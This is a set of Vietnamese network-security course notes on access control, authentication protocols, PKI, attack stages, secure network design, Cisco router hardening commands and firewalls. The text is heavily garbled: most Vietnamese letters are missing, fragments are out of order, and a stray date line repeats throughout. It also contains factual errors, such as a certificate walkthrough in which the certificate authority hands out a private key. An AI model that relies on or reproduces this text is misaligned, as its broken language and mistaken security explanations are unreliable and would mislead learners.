+ Remote Authentication Dial-In User Service (RADIUS)
+ Terminal Access Control Access System (TACAS)
+ Active Directory
-
Decetranlized Access Control Systems (DACS)

L phng thc iu khin tp trung bao gm nhiu h thng CACs khc nhau
trong mt t chc c tch hp trong cc h thng khc nhau khng cn lin quan
ti phn cng v phn mm.
Da vo cc hnh ng vi h thng Access Control cng c th c chia lm cc
loi:
+ Administrative Controls
4. Khi nim v Authentications

a. Nhng yu t nhn dng v xc thc ngi dng
Cc phng thc xc thc ngi dng da vo cc yu t c bn:
-
Something you KNOW
- Da vo mt vi ci bn bit (vd: user/pass)
Something you HAVE

th)
- Da vo mt vi ci bn c (vd: rt tin ATM bn phi c
Something you ARE
- Da vo mt vi ci l bn (vd: vn tay, ging ni)
b. Cc phng thc xc thc

Trong thc t c kh nhiu phng thc xc thc ngi dng hay trong CNTT, mi
dng xc thc c th ph hp vi mt hoc nhiu dch v khc nhau. Di y ti trnh
by mt s phng thc xc thc hay c s dng trong CNTT.
PAP -
7, 2012
Password Authentication Protocol
PAP c s dng bi cc ngi dng t xa cn xc thc qua cc kt ni PPP. PAP

cung cp kar nng nhn din v xc thc ngi dng khi h kt ni t h thng t
xa. Giao thc xc thc ny yu cu ngi dng phi nhp Pasword trc khi c
xc thc. Username v Password c truyn i trn mng sau khi kt ni c
thc hin qua PPP. Server xc thc cha d liu xc thc, khi ngi dng nhp
thng tin s c gi v my ch ny. Ton b Username/Password c truyn
trn mng hon ton khng c m ha (cleartext).
-
CHAP Challenge Handshark Authentication Protocol

CHAP l phng thc xc thc sinh ra khc phc cc im yu v l hng ca
phng thc xc thc PAP. CHAP s dng phng thc challenge/response xc
thc ngi dng. Khi ngi dng mun thit lp mt kt ni PPP c hai s phi
ng s dng phng thc xc thc CHAP. Challenge c m ha s dng mt
khu v encryption key. CHAP hot ng c m t trong m hnh di y:
Kerberos
L phng thc xc thc m User/Password khng c truyn i trn mng. (VD:
h thng Active Directory ca Microsoft s dng phng thc xc thc Kerberos).
Phng thc xc thc Kerberos c th c miu t ging nh chng ta i xem
phim:
7, 2012
+ u tin ngi dng phi c User/Password c thm quyn (i xem phim phi c
tin)
+ Ngi dng yu cu mt dch v (ngi xem cn xem mt b phim chiu lc
gi.)
+ Ngi dng a thm quyn ca mnh cho ngi xc thc (a tin mua v)
+ My ch KDC cung cp thm quyn truy cp dch v cho ngi dng (Phng v
a v cho ngi mua)
+ Ngi dng mang thm quyn c cp mang ti my ch dch v (ngi xem
phim a v ti phng chiu phim ngi xot v kim tra).
Kerberos c th c miu t cc bc nh sau:
Multi factor
L phng thc xc thc nhiu yu t.
V d s dng dch v ATM ca ngn hng bn cn c th ngn hng + mt khu
( l xc thc da vo 2 yu t). Ngoi ra mt s dch v s dng nhiu phng
thc xc thc kt hp nng cao mc bo mt.
Certificate
7, 2012
L phng thc xc thc rng ri trn Internet, cung cp kh nng xc thc an ton
cho ngi dng. Khi ni dung c m ha gi i, ch c Private Key mi gii m
c ni dung, v thng Private key khng c truyn i trn mng.
V d qu trnh xc thc bnh thng khi ngi dng truy cp Gmail:
Bc 1: Ngi dng truy cp gmail.com

Bc 2: Gmail s gi thng tin ti Versign ly Certificate
Bc 3: Versign gi li cho Gmail Certificate bao gm: Public Key v Private key
Bc 4: Gmail gi li cho ngi dng Public Key m ha thng tin xc thc
Bc 5: Ngi dng s dng Public Key m ha gi ln Gmail
Bc 6: Gmail s dng Private key gii m
Phng thc xc thc ny khng an ton khi nhim cc loi m c v nh
Keylogger, ngi dng vn c kh nng mt User/Password
-
RSA
RSA phng thc xc thc t tin v an ton cho qu trnh xc thc v truyn
thng tin trn Internet. RSA khc phc mt s nhc im ca phng thc xc
thc Certificate. y l phng thc hay c s dng giao dch ngn hng.
Biometric
7, 2012
Phng thc xc thc s dng sinh trc hc nhn dng ngi dng nh dng:
Vn tay, tnh mch, vng mc, m thanh, khun mt xc thc ngi dng.
5. Authorization
a. C bn v Authorization
Authorization (Dch ting Vit: S cp quyn) l vic cp quyn cho ngi dng trong
mt h thng sau khi ngi dng xc thc (Authenticaion).
Authorization th hin cc quyn m ngi dng c th thc thi trn h thng.
Authorization lm vic trc tip vi iu khin truy cp Access Control
V d: Trn h thng Authorization ca Windows sau khi ngi dng ng nhp
(Authentication) h thng s cp quyn i vi:
-
File v Folder c NTFS Permmission: Quyn c, ghi, xa, chnh sa. chnh l
thm quyn ngi dng c cp i vi file v folder
i vi h thng c User Right: Cp quyn chnh sa h thng cho ngi dng nh

remote desktop, s thng s card mng..
b. Cc phng thc Authorization

RADIUS
Remote Authentication Dial-in User Service
(RADIUS) cung cp xc thc v iu khin truy
cp s dng giao thc UDP xc thc tp trung
cho ton b h thng mng.
RADIUS c th s dng cho ngi dng truy cp
VPN, RAS hay cung cp xc thc cho cc dch v
s dng RADIUS.
M hnh RADIUS xc thc
cho h thng WIFI
Kerberos
7, 2012
Tng t nh phn Authentication

TACACS
Terminal Access Controller Access Control System (TACACS) iu khin truy cp
bng cch xc thc v cp thm quyn trong h thng UNIX network. Hot ng tng
t nh h thng RADIUS, khi mt h thng cn xc thc s chuyn qua Username v
Password cho my ch TACACS v my ch ny s xc thc v cp quyn truy cp.
TACACS s dng dch v UDP v TCP qua port 49.
TACACS+
Extended Terminal Access Controller Access Control System Plus (TACACS+) l mt
bin th t TACACS. Tng t nh RADIUS giao thc TACACS+ cung cp xc thc
v cp thm quyn c tnh nng Accounting cho vic cp thm quyn tp trung vi yu
cu xc thc.
LDAP
Lightweight Directory Access Protocol (LDAP) cung cp truy cp ti directory
services (dch v danh mc), c tch hp trong Microsoft Active Directory. LDAP
c to ra nh mt phn gin lc ca dch v X.500 Directory Access Protocol, v
s dng port 389. LDAP c s dng rt rng ri trong cc dch v cung cp
directory nh: Directory Service Markup Language (DSML), Service Location
Protocol (SLP), v Microsoft Active Directory.
XTACACS
L mt phin bn ca h thng TACACS c pht trin v cung cp bi Cisco v
c gi li Extended Terminal Access Controller Access Control System
(XTACACS). Dch v pht trin m rng t giao thc TACACS cho php h tr thm
tnh nng Accounting v Auditing, vi hai tnh nng ch c trong TACACS+ v
RADIUS.
IEEE 802.1x
7, 2012
IEEE 802.1x l chun cho wireless, s dng port ph thuc vo dch v cung cp xc
thc (authentication) v cp thm quyn (authorization) nh RADIUS v TACACS+.
Giao thc ny c th c s dng bo mt cho cc giao thc WPA/WPA2.
Ngoi ra IPsec cng l mt giao thc kh ph bin c s dng kt hp vi IEEE
802.1x cung cp bo mt cho h thng mng.
6. Khi nim v Accounting

Gim st l qun l vic truy cp vo h thng ra sao v vic truy cp
din ra nh th no.
- Qun l gim st s gip ngi qun tr xc nh c li do ai ai
v l li g ngi qun tr hon ton c th bit c vic cn thit
khi phc li mt cch nhanh nht.
-
Ngoi ra nh gim st m ngi qun tr s pht hin ra k thm nhp

bt hp php vo h thng , ngn chn cc cuc tn cng.
Vic bn truy cp vo v lm g cng cn qun l bi v trn

thc t th 60% cc cuc tn cng l bn trong h thng 40% l ngoi
Internet. Vic ngn nga nhng tn cng t trong mng rt kh v h
hiu c h thng v c ch bo mt ca h thng.
Ngi qun tr s gim st nhng thuc tnh truy cp, xc thc

pht hin ra cc tn cng v mi e do ca h thng.
Vic trnh din cc kt ni cng rt quan trng, thng qua cc kt ni

bn c th nhn dng k tn cng t u v k nh lm g.
Gim st truy cp v xc thc da trn nhng

hin lhng v tn cng:
thnh t chnh
sau pht
Truy cp li nhiu ln, kt ni theo mt giao thc khc khng c trong h

thng, ng nhp sai mt khu nhiu ln,pht hin Scan mng.v.v..
Quy trnh gim: Gim st h thng: gim st tt c cc tin trnh Logon, tin
trnh truy cp iu khin, tin trnh ca cc chng trnh chy trong h thng.
Gim st truy cp mng, gim st cc giao thc, cc kt ni, mail v mt s
tnh nng truy cp khc.
7, 2012
Gim st tnh nng backup sao lu

Gim st tnh kh dng, tnh sn sng, tnh n nh thng tin
7. Tam gic bo mt CIA

Khi phn tch mt h thng bo mt chng ta cn phi c phng php lun. C vng
d liu yu cu tnh mt ca thng tin, c vng d liu cn tnh ton vn, tt c cc d
liu u phi c p ng khi yu cu l tnh sn sng ca h thng.
- Tnh mt ca thng tin
-
Tnh ton vn thng tin
Tnh sn sng ca h thng

L ba gc ca tam gic bo mt CIA ca mt i tng cn bo v:
a. Confidentiality
Tnh mt ca thng tin la mc bo mt cn thit nhm m bo nhng d liu quan
trng khng b r r hay l thng tin.
7, 2012
K tn cng c th thc hin nhiu phng thc nhm t c mc ch l ly nhng

thng tin mong mun. Nhng phng thc c th l gim st h thng mng, ly
cc file cha mt khu, hay Social engineering.
Thng tin c th b l do khng s dng cc phng thc m ha mnh khi truyn
hay lu tr thng tin.
Tnh mt ca thng tin c i din bi quyn READ.
b. Integrity
Tnh ton vn ca thng tin l mc bo mt cn thit nhm m bo tin tng
ca thng tin khng b thay i hay ch c chnh sa bi ngi c thm quyn.
K tn cng c th thc hin nhiu phng thc nhm thay i nhng thng tin mong
mun. Nhng phng thc c th l t nhp vt qua cc qu trnh xc thc, hoc
tn cng khai thc l hng bo mt ca h thng.
y l mc bo mt thng tin quan trng, hng nm c rt nhiu t chc doanh
nghip b tn cng khai thc l hng bo mt v b thay i d liu.
Tnh ton vn ca thng tin c i din bi quyn MODIFY.
c. Availability
Cho ti truy cp d liu ca bn
Hy bt my tnh ca ti ln trc
Kh nng p ng ca thng tin l iu rt quan trng, iu ny th hin tnh sn sng
phc v ca cc dch v.
Kh nng p ng ca h thng chu nh hng bi kh nhiu thnh phn: c th l
phn cng, phn mm hay h thng Backup.
Kh nng p ng ca h thng cn c tnh n da trn s ngi truy cp v mc
quan trng ca d liu.
7, 2012
8. Mt m hc c bn
a. Khi nim c bn v mt m hc
Mt h thng m ha (cipher system) cung cp mt phng php bo v thng tin
bng vic m ha chng (encrypting) thnh mt dng m ch c th c bi ngi c
thm quyn vi h thng hay mt ngi dng c th. Vic s dng v to h thng
gi l mt m (cryptography).
Mt m c s dng t rt sm trong lch s loi ngi, trc khi c CNTT c rt
nhiu phng thc m ha c s dng.
V d: M ha kinh thnh, m ha Caesa, trong chin tranh th gii th 2 qun i c
s dng c my m ha bng c hc bo v cc bc th trong chin trng.
Ngnh cng nh thng tin c cc phng thc m ha c bn sau:
- Hm bm HASH
-
M ha i xng Symmetric
M ha bt i xng Assymmetric
hiu v nghin cu v mt m cn phi hiu mt s khi nim:

-
Cleartext hay Plantext: L d liu cha c m ha
Ciphertext: L d liu sau khi c m ha
Encrypt: Qu trnh m ha
Algorithm: Thut ton m ha c x dng trong qu trnh m ha
Key: Key c s dng bi thut ton m ha trong qu trnh m ha
Decrypt: Qu trnh gii m
b. Hm bm Hash
Hash l mt phng php hay thut ton c s dng kim tra tnh ton vn ca
d liu, kim tra s thay i ca d liu.
Hash c hai thut ton c bit ti nhiu nht: SHA v MD5.
7, 2012
Khi d liu c truyn trn mng hay lu tr hon ton c th b thay i, ngi nhn
thng tin mun kim tra xem d liu c cn ton vn hay khng th ch cn kim tra
chui Hash ca d liu ban u v d liu nhn c. S dng hm bm kim tra
nu hai chui Hash ging nhau th d liu vn cn ton vn cha b chnh sa v ngc
li.
Thc hnh: S dng MD5 hash mt file
c. M ha i xng Symmetric
Symmetric Key Cryptography l mt h thng m ha s dng mt key m ha
v gii m.
Phng php m ha ny c u im l d dng s dng v tch hp hn l phng
thc m ha bt i xng (Assymmetric). V tc m ha v gii m cng nhanh hn
phng thc m ha bt i xng. Tuy nhin do c qu trnh m ha v gii m s
dng mt Key nn thng key c thit lp sn hai u ngi gi v ngi nhn
(vd: IPsec), hay thng tin c chia s c m ha v ch c ngi c key mi m ra
c.
M ha i xng thng c s dng m ha d liu, cn m ha bt i xng
thng c dng cho xc thc v truyn key.
C rt nhiu thut ton m ha i xng nhng hay dng nht hin nay l thut ton
AES (Advanced Encrypt Standard).
d. M ha bt i xng Assymmetric
Assymmetric Key Cryptography l mt h thng m ha s dng mt cp key: Public
key v Private Key thc hin cho qu trnh m ha v gii m.
Thng thng h thng ny hay s dng Public key m ha v s dng Private Key
gii m:
7, 2012
Hnh m t qu trnh m ha v gii m ca Assymmetric

Do qu trnh sinh key v cung cp Key phc tp nn vic tch hp v s dng phng
thc m ha ny khng d nh Symmetric. Thc hin m ha v gii m mt nhiu ti
nguyn hn nn phng thc ny thng dng vo qu trnh xc thc ngi dng. Tuy
nhin hin nay h thng my tnh rt mnh (VD: Google) nn phng thc ny c
th c s dng truyn d liu.
c th thc hin c phng thc m ha ny i hi phi c mt h thng: To,
cung cp, qun l v khc phc s c cung cp Key (public, private). H thng ny gi
l Public Key Infrastructure (PKI).
Thut ton m ha RSA
l mt thut ton m ha
bt i xng, c s
dng rng ri nht.
M t thut ton =>
7, 2012
e. Tng quan v h thng PKI

thut ton m ha bt i xng (Assymmetric) hot ng cn mt h thng: Sinh
Key, Cung cp Key, Qun l Key, Thit lp chnh sch vi Key, h thng c gi
l Public Key Infrastructure vit tt l PKI.
PKI c s dng rng ri cung cp h thng bo mt cho ng dng v mng, iu
khin truy cp, ti nguyn t website, bo v email v nhiu th khc. PKI bo v
thng tin bi cung cp cc tnh nng sau:
- Identify authentication: Cung cp nhn din v xc thc
-
Integrity verification: Kim tra tnh ton vn d liu
Privacy assurance: m bo s ring t
Access authorization: Cp thm quyn truy cp ti nguyn
Transaction authorization: Thc thi vic cp thm quyn truy cp ti nguyn
Nonrepudiation support: H tr tnh nng chng chi b
Tip theo chng ta cn quan tm ti cc chun v PKI, mi chun ca h thng PKI

c p dng cho cc h ng dng v h thng sau:
PKIX Working Group ca t chc IETF pht trin chun Internet cho PKI da trn
chun X.509 v Certificate, v c trng tm:
-
X.509 Version 3 Public Key Certificate v X.509 Version 2 Certificate Revocation

List (CRLs).
PKI Management Protocols
Operational Protocols
Certificate Policies v Certifcate practice statements (CPSs)
Time-stamping, data-certification, and validation services.
7, 2012
Ni PKIX c pht trin da trn Internet Standards X.509, Public Key Cryptography
Standard (PKCS) l phng thc m ha d liu c pht trin v cng b bi RSA
Lab, hin nay l mt phn ca hng RSA. Trong c 15 ti liu c th v PKCS, v
d:
- PKCS #1 RSA Cryptography Standard cung cp xut v trin khai h thng mt
m Public Key da trn thut ton RSA
-
PKCS #2 c tch hp sn vo PKCS #1
PKCS #15:
Di y l thng tin ca mt Certificate theo chun X.509
H thng PKI gm cc thnh phn:

- Certificate Authority (CA)
7, 2012
CA l thnh phn quan trng trong khi nim v h thng PKI. Cc nh cung cp
CA v nh VeriSign hay Entrust. L h thng cung cp Certificate.
-
Registration Authority (RA)

RA cung cp xc thc ti CA v c coi nh mt Client yu cu chng ch s.
Digital Certificates
Chng ch s l d liu bao gm public key cryptography, hu ht Certificate u
da trn cu trc ca chun X.509. bao gm
Certificate Policies
L chnh sch cho chng ch s, nhn din vic s dng chng ch s. Nhng thng
tin c th nh:
S dng bo v thng tin vi CA
Phng thc xc thc vi CA
Qun l Key
Qun l s dng Private Key
Thi gian s dng chng ch s
Cp mi
Cho php exporrt private key
di ti thiu ca Public key v Private Key
Certificate Practice Statement

CPS l ti liu c to ra v cng b bi CA cung cp cc thng tin ph thuc vo
h thng CA s dng chng ch s. CPS cung cp thng tin CA s dng
7, 2012
V d trn VeriSign l CA, Thawte SGC CA l CSP v thng tin s dng cho dch
v accounts ca Google.
-
Revocation (Thu hi key)

Khi chng ch s c s dng, chng cng c th c thu hi. Qu trnht hu hi
mt chng ch s c thc hin trc khi n b qu hn. Qu trnh thu hi m
bo mt chng ch s khng th tn ti qu thi gian quy nh lc CA to ra.
Trust models
H thng PKI c cu trc n gin l c mt CA. Mt CA trong cu trc cho php
to v qun l chng ch s nhng m hnh ny ch p dng i vi cc t chng
nh bi v tnh n gian. Nhng nu CA li ton b h thng s dng dch v
u b li. gim thiu ri ro cho h thng PKI cho php xy dng h thng c
cu trc bao gm Root CA l tng trn cng sau l cc tng CA con, gia CA
con c qun l khi b li c th xy dng li n gin. l h thng Trust
Models
f. Thc hnh m ha v gii m vi cng c Cryptography tools

9. Khi nim c bn v tn cng mng
a. bc c bn ca mt cuc tn cng
Thng thng mt cuc tn cng c chia lm cc bc c bn nh di y:
7, 2012
Bc 1: Reconnaissance (trinh thm)

L bc u tin ca bt k cuc tn cng no. K tn cng c gng ly cng nhiu
thng tin v i tng cng tt v ch yu qua hai phng thc (Active/Passive).
Passive: k tn cng c th tm thng tin v i tng qua cc knh thng tin
Active: k tn cng thc hin theo di v n tn a im hay v tr ca mc tiu
v tm hiu.
Mc tiu ca bc ny l xc nh c mc tiu.
Bc 2: Scan
Bc th hai thc hin sau khi xc nh c mc tiu. Bc Scan nhm mc
tiu xc nh c cc k h ca i tng. T lp bng lit k c ton b cc
yu t c th thc hin xm nhp vo h thng.
Bc 3: Gaining Accesss
Khi pht hin c cc im yu ca h thng, k tn cng la chn mt hoc
nhiu l hng t tin hnh tn cng v chim quyn iu khin.
Bc 4: Maintaining Access
Khi thc hin tn cng thnh cng, ln sau truy cp vo h thng n gin hn
k tn cng thng s dng Virus, Trojan, backdoor hay nhng on shell code.
7, 2012
Bc 5: Clearing Track
K tn cng thc hin xa nhng du vt truy cp ca mnh nh vic xa log.
b. Mt s khi nim v bo mt.

-
Threat
Mt hnh ng hay mt tnh hung c th nh hng ti bo mt. Threat l mt
nguy c nh hng ti bo mt ca h thng
Vulnerability
L l hng bo mt ca h thng.
Target of Evaluation
L mt h thng cng ngh thng tin l ch ca cuc tn cng
Attack
Tn cng h thng mng c th c chia lm hai dng:
+ Active Attack
+ Passive Attack
Tn cng h thng c th c chia lm nhiu dng khc. Ly thng tin, thay i
thng tin hay ph hy thng tin l nhng mc ch c bn nht ca cc cuc tn
cng
Exploit
L hnh thc khai thc l hng bo mt
c. Cc phng thc tn cng c bn

-
Brute Force
L phng thc tn cng m k tn cng s dng nhng password n gin th
ln lt nhm on ra mt khu ca ngi dng. Phng thc ny ch p dng i
vi nhng mt khu n gin.
Dictionary
L phng thc tn cng tng t Brute force nhng thay v th ln lt mt khu
,k tn cng s dng b t in cha mt khu cn th.
Spoofing
7, 2012
L dng tn cng m mt c nhn, mt h thng thc hin hnh vi gi mo. V nh

mt ngi gi mo a ch mail gi i m khng cn phi xc thc.
-
DoS
L dng tn cng m mt ngi hay mt h thng lm cho mt h thng khc
khng th truy cp hoc b chm i ng k bng cch s dng ht cc ti nguyn.
Man-in-the-middle
K tn cng bng mt cch no ng gia lung cng ng gia giao tip ca
hai my tnh.
Replay
V d: khi mt qu trnh xc thc c thc hin thnh cng v b k tn cng
capture c qu trnh . Khi cn ng nhp vo h thng, k tn cng pht li
lung traffic thc hin xc thc. l phng thc tn cng Replay
Sesion Hijacking
Khi ngi dng thc hin thnh cng qu trnh xc thc, k tn cng thc hin tn
cng cp phin giao tip. Dng tn cng l Session Hijacking.
d. ch ca cc dng tn cng
Cc dng tn cng c chia theo ch ca dng tn cng :
o Operating System: ch tn cng l cc h iu hnh. Ngy nay cc h iu hnh
rt phc tp vi nhiu serivice, port, nhiu ch truy cp. Vic v cc l hng
bo mt ngy cng phc tp v i khi vic cp nht khng c thc hin. K
tn cng thc hin khai thc cc l hng bo mt trn cc h iu hnh .
o Application: ch tn cng l cc ng dng. Cc ng dng c pht trin bi
cc hng phn mm c lp v i khi ch quan tm ti p ng nhu cu cng
vic ca ng dng m qun i vic phi bo mt cho ng dng. Rt nhiu ng
dng c l hng bo mt cho php hacker khai thc.
o Shrink Wrap: Cc chng trnh, ng dng i khi b l m code v vic ny
cng l l hng bo mt rt ln.
o Misconfiguration: cc thit lp sai trn h thng i khi to k h cho k tn
cng thc hin khai thc.
7, 2012
III.
INFRASTRUCTURE SECURITY (AN NINH H TNG).
Trong phn ny gm cc ni dung chnh sau:

Cc gii php v l trnh xy dng bo mt h tng mng
Thit k m hnh mng an ton
Thnh phn bo mt trong h tng mng
Bo mt cho h iu hnh
Xy dng chnh sch an ton thng tin
7, 2012
7, 2012
1. Cc gii php v l trnh xy dng bo mt h tng mng

c th xy dng mt h thng mng m bo tnh an ton cn phi c l trnh xy dng
hp l gia: Yu cu v Chi ph c th chi tr t la chn nhng gii php.
Gii php ph hp nht phi cn bng c cc yu t:
-
Tnh nng yu cu
Gi thnh gii php
Tnh nng
Hiu nng ca h thng
VD1: Chng ta khng th xy dng gii php hng triu $ bo v cho mt my c nhn
khng quan trng c.
VD2: Chng ta cn bo v cho h thng web, u cn nhng tnh nng v Endpoint security
VD3: Chng ta khng th chim 50% Performance ca h thng cho cc chng trnh bo v
c.
Bt k doanh nghip hay t chc no cng khng th cng mt lc c th trin khai ton b
cc gii php bo mt, iu ny t ra cn phi c l trnh xy dng r rng. Mt l trnh xy
dng cn phi p ng tnh ph kn v tng thch gia cc gii php vi nhau trnh chng
cho v xung t. Mt n v c th da vo l trnh ny c th xy dng c mt h
tng CNTT p ng tnh bo mt.
Di y l l trnh cc bc cng nh gii php xy dng mt h thng mng m bo
tnh bo mt cao
7, 2012
7, 2012
3. Thit k m hnh mng an ton

cc gii php v an ton thng tin lm vic khng b trng lp v xung t cn phi c m
hnh thit k ph hp. Di y l mt m hnh ti thy t thit k cc vng, thit b s
dng, truy cp t xa, tnh HA u c:
Ti c kh nhiu cun v Security nhng cha thy cun no c m hnh dng Module nh
th ny, a phn l nhng m hnh n gin v thiu tnh thc t.
Phn tch tng quan m hnh c chia lm cc module:

+ Module Internet gm: Router, Proxy v ti u ha bng thng, Firewall
7, 2012
+ Module DMZ: IPS bo v v cc Server public ra internet

+ Module Core: Vng Routing v Switching li ca ton b h thng, ni thit lp
Access Controll List cho cc vng.
+ Module Server Farm: Ni cha cc server quan trng nh my ch d liu, core
banking c gim st bi thit b IDS
+ Module Management: L vng mng an ton cm cc cng qun tr ca cc thit
b v my ch
+ Vng User: Cung cp mng cho ngi dng ti c quan
+ Branch: Kt ni ti cc mng chi nhnh trn c nc.
-
Phn tch cc thit b bo mt:

+ Router v Switch Core thit lp Access Controll List v m bo tnh HA cho ton
b cc kt ni
+ Proxy ng ra ti u ha bng thng Input-Output
+ Firewall c chc nng ng m port v public server cng nh cho cc kt ni VPN
+ IPS thit b gim st, pht hin v ngn chn cc cuc tn cng mng
+ Endpoint Security: Gii php Endpoint cho my trm my ch
+ Gii php Data Loss Prevent chng tht thot d liu
+ Network Access Control qun l truy cp mng
4. Router v Switch
a. Chc nng ca Router
- Routing: thc hin vic Routing cc gi tin trn mng
- NAT: Thc hin NAT cc a ch IP t private public v ngc li
7, 2012
- Access Control List: Cho php to cc Access Control List p ng yu cu chn port,
ip ca ngi qun tr.
b. Chc nng ca Switch
- Thc hin vic Switch cc gi tin Layer 2
c. Bo mt trn Switch
- Chia VLAN: Cho php to ra nhiu mng trn mt Switch, trnh c s bng n ca
Virus hay cc dng tn cng khc.
- Security Port: Gn c nh mt s a ch MAC vo mt port nht nh trn Switch, cho
php chn c cc dng tn cng nh MAC Spoofing, ARP Spoofing.
d. Bo mt trn Router
- Router l thit b rt quan trng trong m hnh mng, cho php routing, nat v to ra cc
ACLs bo v h thng mng t tng Gateway.
Lab: Ci t Packet Tracert 4.0 test mt s cu lnh trn Router.
Hiu v Access Control List
Trn Router Cisco to ra mt Access List (ch p dng cho a ch IP) s dng cu lnh:
7, 2012
Router(config)# access-list access list number {permit|deny} source [sourcemask]
p dng Access List va to:
Router (config-if)# ip access-group access-list-number {in|out}
To v p dng Extended Access Control List (cho php p dng cho port v IP).
Router(config)# access-list access-list-number {permit|deny} protocol source

source-mask destination destination mask [operator|operand]
Router(config-if)#ip access-group access-list number {in|out}
Xem li h thng Log trn Router chng ta c th bit c h thng block hay nhng
ai truy cp vo Router.
e. Thit lp bo mt cho Router
t a ch IP trn mt Interface:
Router> Enable
Router# Configure Terminal
Router (Config)# Interface Ethernet 0
Router (Config-if)# ip address 192.168.0.35 255.255.255.0
t Password cho Console login
Router#config terminal
Router(config)#line console 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#
t password cho remote
Router(config)#line vty 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router
To User trn Router
Router#configure terminal
Router(conf)#username Auser password u$3r1
Router(conf)#username Buser password u$3r2
Router(conf)#username Cuser password u$3r3
Router(conf)#username Duser password u$3r4
Router(conf)#^Z
Thit lp ng nhp qua SSH trn Router
Router(config)#ip domain-name scp.mil
Router(config)#access-list 23 permit 192.168.51.45
Router(config)#line vty 0 4
Router(config-line)#access-class 23 in
Router(config-line)#exit
Router(config)#username SSHUser password No+3ln3+
Router(config-line)#login local
Router(config-line)#exit
Router(config)#
Router(config)#crypto key generate rsa
The name for the keys will be: Router.scp.mil
Choose the size of the key modulus in the range of 360 to 2048
7, 2012
for your General Purpose Keys. Choosing a key modulus greater
than 512 may take a few minutes.
How many bits in the modulus [512]: 1024
Generating RSA keys ...
[OK]
Router(config)#
Router(config)#ip ssh timeout 45
Router(config)#^Z
Router(config)#ip ssh authentication-retries 2
Router(config)#^Z
Router(config-line)#transport input ssh telnet
Router# show ip ssh
Thit lp static route trn router
MarketingRouter#config terminal
7, 2012
MarketingRouter(config)#ip route 10.0.10.0 255.255.255.0
20.0.20.1
MarketingRouter(config-line)#^Z
MarketingRouter#
FinanceRouter#config terminal
FinanceRouter(config)#ip route 30.0.30.0 255.255.255.0 20.0.20.2
FinanceRouter(config-line)#^Z
FinanceRouter#
Thit lp RIP (Dynamic route) trn Router
LEFT#configure terminal
LEFT(config)#router rip
LEFT(config-router)#network 172.16.0.0
LEFT(config-router)#network 192.168.10.0
LEFT(config-router)^Z
LEFT#
Bo mt Router trc cc dng ICMP
Router(config)#interface Serial 0
Router(config-if)#no ip unreachables
Router(config-if)#^Z
Router(config)#interface Ethernet 0
Router(config-if)#no ip directed broadcast
7, 2012
Router(config-if)#^Z
Bo v Source Routing
Router(config)#no ip source-route
Router(config)#^Z
Router#
Small Services
Router(config)#no service tcp-small-servers
Router(config)#no service udp-small-servers
Router(config)#^Z
Router#
Chng Finger
Router(config)#no service finger
Router(config)#^Z
Router#
Router(config)#no ip finger
Router(config)#^Z
Router#
Tt cc Services khng cn thit

7, 2012
Router(config)#no ip bootp server
Router(config)#no ip name-server
Router(config)#no ntp server
Router(config)#no snmp-server
Router(config)#no ip http server
Router(config)#^Z
7, 2012
To cc Access Control List (bn trn).

5. Firewall v Proxy
a. Khi nim Firewall
Thut ng Firewall c ngun gc t mt k thut thit k trong xy dng ngn chn,
hn ch ha hon. Trong cng ngh thng tin, Firewall l mt k thut c tch hp vo
h thng mng chng s truy cp tri php, nhm bo v cc ngun thng tin ni b
v hn ch s xm nhp khng mong mun vo h thng. Firewall c miu t nh l
h phng th bao quanh vi cc cht kim sot tt c cc lung lu thng nhp xut.
C th theo di v kha truy cp ti cc cht ny.
Cc mng ring ni vi Internet thng b e da bi nhng k tn cng. bo v d
liu bn trong ngi ta thng dng firewall. Firewall c cch no cho php ngi
dng hp i qua v chn li nhng ngi dng khng hp l.
Firewall c th l thit b phn cng hoc chng trnh phn mm chy trn host bo m
hoc kt hp c hai. Trong mi trng hp, n phi c t nht hai giao tip mng, mt
cho mng m n bo v, mt cho mng bn ngoi. Firewall c th l gateway hoc im
ni lin gia hai mng, thng l mt mng ring v mt mng cng cng nh l
Internet. Cc firewall u tin l cc router n gin.
b. Chc nng ca Firewall
Chc nng chnh ca Firewall l kim sot lung thng tin t gia Intranet v Internet.
Thit lp c ch iu khin dng thng tin gia mng bn trong (Intranet) v mng
Internet.
Cho php hoc cm nhng dch v truy cp ra ngoi.
Cho php hoc cm nhng dch v t ngoi truy cp vo trong.
7, 2012
Theo di lung d liu mng gia Internet v Intranet
Kim sot a ch truy nhp, cm a ch truy nhp
Kim sot ngi s dng v vic truy cp ca ngi s dng. Kim sot ni dung
thng tin lu chuyn trn mng.

Mt firewall kho st tt c cc lung lu lng gia hai mng xem n c t chun
hay khng. Nu n t, n c nh tuyn gia cc mng, ngc li n b hy. Mt b
lc firewall lc c lu lng ra ln lu lng vo. N cng c th qun l vic truy cp
t bn ngoi vo ngun ti nguyn mng bn trong. N c th c s dng ghi li tt
c cc c gng vo mng ring v a ra cnh bo nhanh chng khi k th hoc k
khng c phn quyn t nhp. Firewall c th lc cc gi da vo a ch ngun, a
ch ch v s cng ca chng. iu ny cn c gi l lc a ch. Firewall cng c th
lc cc loi c bit ca lu lng mng. iu ny c gi l lc giao thc bi v vic
ra quyt nh cho chuyn tip hoc t chi lu lng ph thuc vo giao thc c s
dng, v d HTTP, FTP hoc Telnet. Firewall cng c th lc lung lu lng thng qua
thuc tnh v trng thi ca gi.
Mt s firewall c chc nng th v v cao cp, nh la c nhng k xm nhp rng
h ph v c h thng an ton. V c bn, n pht hin s tn cng v tip qun n,
dn dt k tn cng i theo bng tip cn nh phn chiu (hall of mirrors). Nu k tn
cng tin rng h vo c mt phn ca h thng v c th truy cp xa hn, cc hot
ng ca k tn cng c th c ghi li v theo di.
Nu c th gi k ph hoi trong mt thi gian, ngi qun tr c th ln theo du vt ca
h. V d, c th dng lnh finger theo vt k tn cng hoc to tp tin by mi
h phi mt thi gian truyn lu, sau theo vt vic truyn tp tin v ni ca k tn
cng qua kt ni Internet.
c. Nguyn l hot ng ca Firewall
Cc rule ca Firewall hot ng tng t nh Access Control List ca Router, Rule ca
firewall c kh nng lc gi tin su hn ACL.
Firewall hot ng cht ch vi giao thc TCP/IP, v giao thc ny lm vic theo thut
tn chia nh cc d liu nhn c t cc ng dng trn mng, hay ni chnh xc hn l
cc dch v chy trn cc giao thc (Telnet, SMTP, DNS, SMNP, NFS ) thnh cc gi
d liu (data packets) ri gn cho cc packet ny nhng a ch c th nhn dng, ti lp
li ch cn gi n, do cc loi Firewall cng lin quan rt nhiu n cc packet v
nhng con s a ch ca chng.
7, 2012
